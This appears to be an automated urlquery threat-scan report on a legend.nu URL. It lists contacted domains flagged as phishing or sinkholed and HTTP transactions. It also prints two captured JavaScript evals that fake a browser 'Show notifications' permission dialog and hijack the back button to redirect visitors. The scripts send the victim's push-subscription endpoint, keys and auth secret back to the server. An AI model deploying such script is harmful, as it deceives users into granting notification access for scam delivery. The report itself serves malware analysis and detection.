urlquery - report: legend.nu/personal-disk/VAlWCjth-ecLJq0E-module/6199746691-sNIGrruBaNwrmrp-cJ9mWd-UgM7YnMg/439681842717-zqUods5c/

Fully Qualifying Domain Name	Rank	First Seen	Last Seen	IP	Comment
content-signature-2.cdn.mozilla.net (1)	1152	No data	No data	34.160.144.191
legend.nu (1)	0	2015-08-26 04:19:21 UTC	2022-10-23 05:42:37 UTC	64.40.126.65	Unknown ranking
broworker4s.com (2)	0	2022-10-07 16:21:26 UTC	2022-10-28 04:53:31 UTC	212.129.18.219	Unknown ranking
push.services.mozilla.com (1)	2140	2019-05-26 10:52:39 UTC	2020-05-03 10:09:39 UTC	44.238.3.246
di4.biz (2)	0	2017-01-20 19:13:06 UTC	2022-10-27 18:14:41 UTC	185.177.92.179	Unknown ranking
img-getpocket.cdn.mozilla.net (6)	1631	2019-03-04 20:37:34 UTC	2020-02-19 04:43:25 UTC	34.120.237.76
r3.o.lencr.org (7)	344	No data	No data	23.36.77.32
ocsp.digicert.com (2)	86	2012-06-27 22:09:06 UTC	2020-05-02 20:58:10 UTC	93.184.220.29
contile.services.mozilla.com (1)	1114	2021-05-27 18:32:35 UTC	2022-10-27 04:50:21 UTC	34.117.237.239
new.weatherplllatform.com (1)	0	2022-10-25 20:18:12 UTC	2022-10-28 05:03:18 UTC	91.211.91.114	Unknown ranking
greenskymotions.net (2)	0	2022-10-27 09:01:55 UTC	2022-10-28 05:52:56 UTC	185.177.94.152	Unknown ranking
0.greenskymotions.net (2)	0	2022-10-27 09:01:52 UTC	2022-10-28 05:52:56 UTC	185.177.94.152	Unknown ranking

Scan Date	Severity	Indicator	Comment
2022-10-28	2	greenskymotions.net/go/mu4genjugq5dcmjrhe3a?sub2=titlespeed8	Phishing

Scan Date	Severity	Indicator	Comment
2022-10-28	2	legend.nu	Sinkholed
2022-10-28	2	di4.biz	Sinkholed
2022-10-28	2	di4.biz	Sinkholed

Date	UQ / IDS / BL	URL	IP
2023-01-30 03:16:02 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-30 00:04:01 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 20:52:46 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 17:40:34 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 14:27:17 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65

Date	UQ / IDS / BL	URL	IP
2023-01-30 03:16:02 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-30 00:04:01 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 20:52:46 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 17:40:34 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65
2023-01-29 14:27:17 +0000	0 - 2 - 3	alinac.ca/images/Lp6yKpIpRf6/	64.40.126.65

Date	UQ / IDS / BL	URL	IP
2022-10-28 08:55:00 +0000	0 - 0 - 4	legend.nu/personal-disk/individual-area/22160 (...)	64.40.126.65
2022-10-28 08:54:13 +0000	0 - 0 - 4	legend.nu/personal-disk/VAlWCjth-ecLJq0E-modu (...)	64.40.126.65
2022-10-28 08:53:28 +0000	0 - 0 - 2	legend.nu/personal-disk/public/txf68m3e0/1gl7 (...)	64.40.126.65
2022-10-28 08:52:26 +0000	0 - 0 - 2	legend.nu/personal-disk/WFEYeUeMIX/	64.40.126.65
2022-10-23 05:42:47 +0000	0 - 0 - 2	legend.nu/personal-disk/individual-area/22160 (...)	64.40.126.65

Date	UQ / IDS / BL	URL	IP
2023-01-30 03:37:53 +0000	0 - 0 - 4	hicrypto.com.cn/all/sign.php?authenticated=tr (...)	155.94.129.146
2023-01-30 03:37:47 +0000	0 - 0 - 3	nicolai.com.cn/all/sign.php?authenticated=tru (...)	155.94.129.146
2023-01-30 03:37:42 +0000	0 - 0 - 4	iotlabels.com/all/sign.php?authenticated=true (...)	155.94.129.146
2023-01-30 03:37:22 +0000	0 - 0 - 1	digitaltool.com.cn/all/sign.php?authenticated (...)	155.94.129.146
2023-01-30 03:28:09 +0000	0 - 0 - 2	gbsports.theapplab.org/excel/PHPExcel/Shared/ (...)	192.169.136.66

JavaScript

Executed Scripts (8)

Executed Evals (2)

#1 JavaScript::Eval (size: 7962) - SHA256: 7a24518fd78ad356f70fc8d316e1a4ce3b9d43c70ef2e5cf00a9f03cb4fb8d20

'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = mnstsmbzgm5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrwgy4tinzsgq2a & p = b & sub1 = & sub2 = titlespeed8 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //0.greenskymotions.net/index.php?p=mu4genjugq5dcmjrhe3a&sub2=titlespeed8')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://0.greenskymotions.net/index.php?p=mu4genjugq5dcmjrhe3a&sub2=titlespeed8'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=16738a15-f934-4aa4-83be-20047edaf749&d=mu4genjugq5dcmjrhe3a&land=4',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=mnstsmbzgm5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrwgy4tinzsgq2a&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=mnstsmbzgm5dcnrqgixtcmjrhe3c6nbpmy2tezlemi2dklzrgixtcnrwgy4tinzsgq2a&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}

#2 JavaScript::Eval (size: 8090) - SHA256: 0e267e69873411b64c940d2e4d4ea9ba7cecf5b398e2c5568a469ea5576d8cd1

'use strict';
var guardEnabled = false;
var isChrome = false;
if (guardEnabled && /Chrome/.test(navigator.userAgent || '') && /Google Inc/.test(navigator.vendor || '')) {
    let version = navigator.userAgent.match(/Chrom(?:e|ium)\/([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)/);
    if (version !== null && compareVersion('74.0.3729.131', version[1]) <= 0) {
        isChrome = true
    }
}

function compareVersion(v1, v2) {
    if (typeof v1 !== 'string') return false;
    if (typeof v2 !== 'string') return false;
    v1 = v1.split('.');
    v2 = v2.split('.');
    const k = Math.min(v1.length, v2.length);
    for (let i = 0; i < k; ++i) {
        v1[i] = parseInt(v1[i], 10);
        v2[i] = parseInt(v2[i], 10);
        if (v1[i] > v2[i]) return 1;
        if (v1[i] < v2[i]) return -1
    }
    return v1.length == v2.length ? 0 : (v1.length < v2.length ? -1 : 1)
}
const MESSAGES = {
        ru: {
            title: '... 70?@0H8205B @07@5H5=85 =0:',
            permission: '>:07 C254><;5=89',
            allow: ' 07@5H8BL',
            disallow: ';>:8@>20BL'
        },
        en: {
            title: '... wants to:',
            permission: 'Show notifications',
            allow: 'Allow',
            disallow: 'Block'
        },
        it: {
            title: '... chiede il permesso di:',
            permission: 'Mostra notifiche',
            allow: 'Permettere',
            disallow: 'Bloccare'
        },
        id: {
            title: '... meminta izin untuk:',
            permission: 'Tampilkan pemberitahuan',
            allow: 'Mengizinkan',
            disallow: 'Blok'
        },
        vi: {
            title: '... xin ph�p:',
            permission: 'Hi�n th� th�ng b�o',
            allow: 'Cho ph�p',
            disallow: 'Kh�i'
        },
        ar: {
            title: '... J7D( %0F D:',
            permission: '%8G'
            1 'D%.7'
            1 '*',
            allow: ''
            D3E '-',
            disallow: 'EF9'
        },
        pl: {
            title: '... prosi o pozwolenie:',
            permission: 'Poka| powiadomienia',
            allow: 'Dopuszcza',
            disallow: 'Blok'
        },
        pt: {
            title: '... pede permiss�o para:',
            permission: 'Mostrar notifica��es',
            allow: 'Permitir',
            disallow: 'Quadra'
        },
        fr: {
            title: '... demande la permission de:',
            permission: 'Afficher les notifications',
            allow: 'Permettre',
            disallow: 'Bloc'
        },
        de: {
            title: '... bittet um Erlaubnis:',
            permission: 'Zeige Benachrichtigungen',
            allow: 'Erm�glichen',
            disallow: 'Block'
        },
        es: {
            title: '... pide permiso para:',
            permission: 'Mostrar notificaciones',
            allow: 'Permitir',
            disallow: 'Bloquear'
        },
        th: {
            title: '... --8
            2 1: ',permission:'
            A * 2 # A I@ 7 - ',allow:' - 8 2 ',disallow:' % 8 H!'}};MESSAGES.uk=MESSAGES.ru;MESSAGES.current=MESSAGES[getLanguage()]||MESSAGES.en;function getLanguage(){let language=window.navigator?(window.navigator.userLanguage||window.navigator.language||window.navigator.browserLanguage||window.navigator.systemLanguage):'
            ru ';language=language.substr(0,2).toLowerCase();return language}let template='\ < div style = "color:#000;box-sizing: border-box;-webkit-box-sizing:border-box;width: 320px;max-width: 100%;height: 130px;background: #fff;position: fixed;top: 0;left: ' + (window.innerWidth < 400 ? 0 : 56) + 'px;box-shadow: 0 0 20px #0000008a;border-radius: 3px;line-height: 1;" > < img class = "js-close"
            style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 0;margin:0;position: absolute;width: 11px;height:11px;right:10px;top:10px;cursor: pointer;outline: 0 !important;"
            src = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAB4AAAAeCAMAAAAM7l6QAAAAS1BMVEUAAABaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlpaWlo8++Y/AAAAGHRSTlMAC/Tp5NHux7woBr8u1CEiE8wfMh3aqKRGKXN5AAAAxklEQVQoz22SWxaDIAxEo6JQLIpWW/a/0kYE5xCYDx+53BwkEse4herMbqVIQ1AVtzNXD76bwBlWQfVVVfvlRv4qsE5VOvkKH+4d8mN6mh6/23LpzS/ggvZMJa+XW43loNisfdp5Kl3hq0TlQc0BwWdKDlfGgKqD6vwy3Tpq5Jvx6FvzFRurKfjSpvCb9HzOZ2/QydNW9zf1SOCD3gN14NJNA0d/K2jhH8IV/kQ60Q8o/J46DRfxLv8xVsMt/EgvPkQqfcUd/7Y7JTdYkYd+AAAAAElFTkSuQmCC" / > < div style = "box-sizing: border-box;-webkit-box-sizing:border-box;padding: 5% 5% 4% 5%;font-family: calibri,arial;font-size: 17px;" > '+MESSAGES.current.title+' < /div><div style="text-align: left;font-size: 0;line-height: 0;padding: 0 5%;"><img style="width:13px;vertical-align: top;padding: 0;margin: 0;display: inline-block;" src="data:image/png;base64,
            iVBORw0KGgoAAAANSUhEUgAAACQAAAAqCAMAAADs1AnaAAAAUVBMVEUAAABaWlpZWVlaWlpZWVlSUlJZWVlaWlpZWVlZWVlWVlZOTk5ZWVlZWVlaWlpZWVlZWVlXV1dRUVFaWlpaWlpZWVlaWlpZWVlaWlpVVVVaWlqPKIPXAAAAGnRSTlMAXm2UZw358qZCMAjfzbOrWDUX48S4nIx3J6SDwgkAAAC9SURBVDjL7dLLDoMgEIXhaSsC3vHuef8HLVETFWHUpMv + 6 y9nMUBupm0NXVTFQFzxRmSwZYJFUwxbPLEoWVDCEN1nmMt6HVopsKvwrkUSh2R0NiNOjacdeHK2EulDMjmgDt66vdEItL + ECiG1GdGEULO9okEws / 2 PMKrcI / GneofR + 49 + iB49S1qEUZGuRoFJpbMpwVZaJVbDKEE5LssJN6LXjeh59Wet5pDEnOQQDQsaiEso2JQgPp3nmpy + KIFSTz3Bs58AAAAASUVORK5CYII = "/><span style="
            display: inline - block;vertical - align: top;margin - left: 14 px;font - size: 15 px;line - height: 1;font - family: Calibri,
            Arial;font - weight: 400;
            ">'+MESSAGES.current.permission+'</span></div><div style="
            padding: 22 px 12 px 0 12 px;font - size: 0;line - height: 0;text - align: right;
            "><div class="
            js - allow " style="
            font - weight: 600;border: 1 px solid # dadce0;color: #3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" >'+MESSAGES.current.allow+'</div><div class= "js-denied"
            style = "font-weight:600;border:1px solid#dadce0;color:#3673E3;margin-left:10px;text-shadow:none;display:inline-block;vertical-align:top;min-width:109px;text-align:center;padding:0 15px;margin:3px;height:30px;line-height:28px;border-radius:4px;cursor:pointer;font-family:Calibri,Arial;outline:0!important;font-size:12px;" > '+MESSAGES.current.disallow+' < /div></div > < /div>';var rootElement=null;var canStart=false;window.onload=function(){function GGG(){if(isChrome&&rootElement){rootElement.parentNode.removeChild(rootElement);rootElement=null;let wait=()=>{if(!canStart){return setTimeout(wait,500)}};wait();SSS()}}document.querySelector('html').addEventListener('click',GGG);document.querySelector('html').addEventListener('keydown',GGG);if(isChrome){rootElement=document.createElement('div');rootElement.innerHTML=template;document.body.appendChild(rootElement)}};function disableHistory(){try{$(window).on('popstate',function(t){if(t.state){if(Notification.permission==='granted'){location.replace('https:/ / di4.biz / ? auf = mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di & p = b & sub1 = & sub2 = titlespeed8 & sub3 = & sub4 = & cpc = 0 & cpm = 0 ')}else{location.replace('
            https : //di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0')}}})}catch(error){}}disableHistory();let myApplicationServerKey=urlB64ToUint8Array('BIbjCoVklTIiXYjv3Z5WS9oemREJPCOFVHwpAxQphYoA5FOTzG-xOq6GiK31R-NF--qzgT3_C2jurmRX_N6nY4g');var denied=function(){window.location.href='https://di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0'};let workerInstaller=null;function getWorkerRegistration(){return workerInstaller.then(()=>navigator.serviceWorker.ready)}function CCC(){return getWorkerRegistration().then(registration=>registration.pushManager.subscribe({userVisibleOnly:true,applicationServerKey:myApplicationServerKey})).then(fff=>{let gmt=-new Date().getTimezoneOffset()/60;let rawKey=fff.getKey?fff.getKey('p256dh'):'';let key=rawKey?btoa(String.fromCharCode.apply(null,new Uint8Array(rawKey))):'';let rawAuthSecret=fff.getKey?fff.getKey('auth'):'';let authSecret=rawAuthSecret?btoa(String.fromCharCode.apply(null,new Uint8Array(rawAuthSecret))):'';return fetch('/?send=16738a15-f934-4aa4-83be-20047edaf749&d=mu4genjugq5dcmjrhe3a&land=19',{method:'POST',mode:'no-cors',body:JSON.stringify({id:fff.endpoint,key:key,secret:authSecret,gmt:gmt,uri:window.location.href})})}).then(()=>{window.location.href='https://di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0'}).catch(()=>{denied()})};function SSS(){Notification.requestPermission().then(function(){if(Notification.permission==='granted'){CCC()}else{denied()}})};if('serviceWorker'in navigator){workerInstaller=navigator.serviceWorker.register('/b91698fd2.js').then(()=>{if(Notification.permission==='granted'){window.location.href='https://di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0'}else if(Notification.permission!=='denied'){canStart=true;if(!isChrome){SSS()}}else{denied()}})}

Executed Writes (0)

HTTP Transactions (28)

Request	Response
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: 853f97990fe10ccb34066b1e73e93dac45794f42fb745b266b6a46b9e26d52e9 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "853F97990FE10CCB34066B1E73E93DAC45794F42FB745B266B6A46B9E26D52E9" Last-Modified: Thu, 27 Oct 2022 09:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=14276 Expires: Fri, 28 Oct 2022 12:51:59 GMT Date: Fri, 28 Oct 2022 08:54:03 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 1e997bec759570aa0db03e31bf013cc2 Sha1: 948fd8263ab0b40f75eaf9495f76a7f39f39d5f9 Sha256: 853f97990fe10ccb34066b1e73e93dac45794f42fb745b266b6a46b9e26d52e9
POST / HTTP/1.1 Host: ocsp.digicert.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 83 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: ocsp.digicert.com/ FQDN: ocsp.digicert.com IP: 93.184.220.29 HASH: a5ff1b60b9ef85086d0c6617d9d39cf17ae45855bf7b0ee24ec49ad5a863c18e 93.184.220.29 HTTP/1.1 200 OK Content-Type: application/ocsp-response Accept-Ranges: bytes Age: 3227 Cache-Control: max-age=91853 Date: Fri, 28 Oct 2022 08:54:03 GMT Etag: "635a4fdd-1d7" Expires: Sat, 29 Oct 2022 10:24:56 GMT Last-Modified: Thu, 27 Oct 2022 09:31:09 GMT Server: ECS (ska/F705) X-Cache: HIT Content-Length: 471 --- Additional Info --- Magic: data Size: 471 Md5: 221b3fe9a6458de64d8bbfcd4a8e2f36 Sha1: 988c93428ff15108d46a11865e1c7e2782fbae34 Sha256: a5ff1b60b9ef85086d0c6617d9d39cf17ae45855bf7b0ee24ec49ad5a863c18e
POST / HTTP/1.1 Host: r3.o.lencr.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/ocsp-request Content-Length: 85 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache	URL: r3.o.lencr.org/ FQDN: r3.o.lencr.org IP: 23.36.77.32 HASH: 2f53662c68c9ea7be85837310861c8007fd039e5e4d8eb8f0d8948d5d1571a03 23.36.77.32 HTTP/1.1 200 OK Content-Type: application/ocsp-response Server: nginx Content-Length: 503 ETag: "2F53662C68C9EA7BE85837310861C8007FD039E5E4D8EB8F0D8948D5D1571A03" Last-Modified: Thu, 27 Oct 2022 14:00:00 UTC Cache-Control: public, no-transform, must-revalidate, max-age=3877 Expires: Fri, 28 Oct 2022 09:58:40 GMT Date: Fri, 28 Oct 2022 08:54:03 GMT Connection: keep-alive --- Additional Info --- Magic: data Size: 503 Md5: 42d84e61e6aa4d3cce623adccfafc3e2 Sha1: 0dba69e98be53c153a6726ff934b2d55feb20d75 Sha256: 2f53662c68c9ea7be85837310861c8007fd039e5e4d8eb8f0d8948d5d1571a03
GET /chains/remote-settings.content-signature.mozilla.org-2022-11-19-18-50-54.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: content-signature-2.cdn.mozilla.net/chains/remote-setti (...) FQDN: content-signature-2.cdn.mozilla.net IP: 34.160.144.191 HASH: 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78 34.160.144.191 HTTP/2 200 OK content-type: binary/octet-stream x-amz-id-2: wxmtRhzeqrG9YYNIqZCvsoVnte08ZoLm1fJTJgdSed9Bm2iJV/mm6W2tcL7qEsVzmSfbnlheTUs= x-amz-request-id: M1CS3KXYPVRPZ1ME content-disposition: attachment accept-ranges: bytes server: AmazonS3 content-length: 5348 via: 1.1 google date: Fri, 28 Oct 2022 08:43:33 GMT age: 630 last-modified: Fri, 30 Sep 2022 18:50:55 GMT etag: "67d5a988edcda47bc3b3b3f65d32b4b6" cache-control: public,max-age=3600 alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: PEM certificate\012- , ASCII text Size: 5348 Md5: 67d5a988edcda47bc3b3b3f65d32b4b6 Sha1: d4f0e0da8b3690cc7da925026d3414b68c7d954f Sha256: 55e4848e3ec682e808ce7ee70950f86179c43af4f81926d826a95edfda395a78
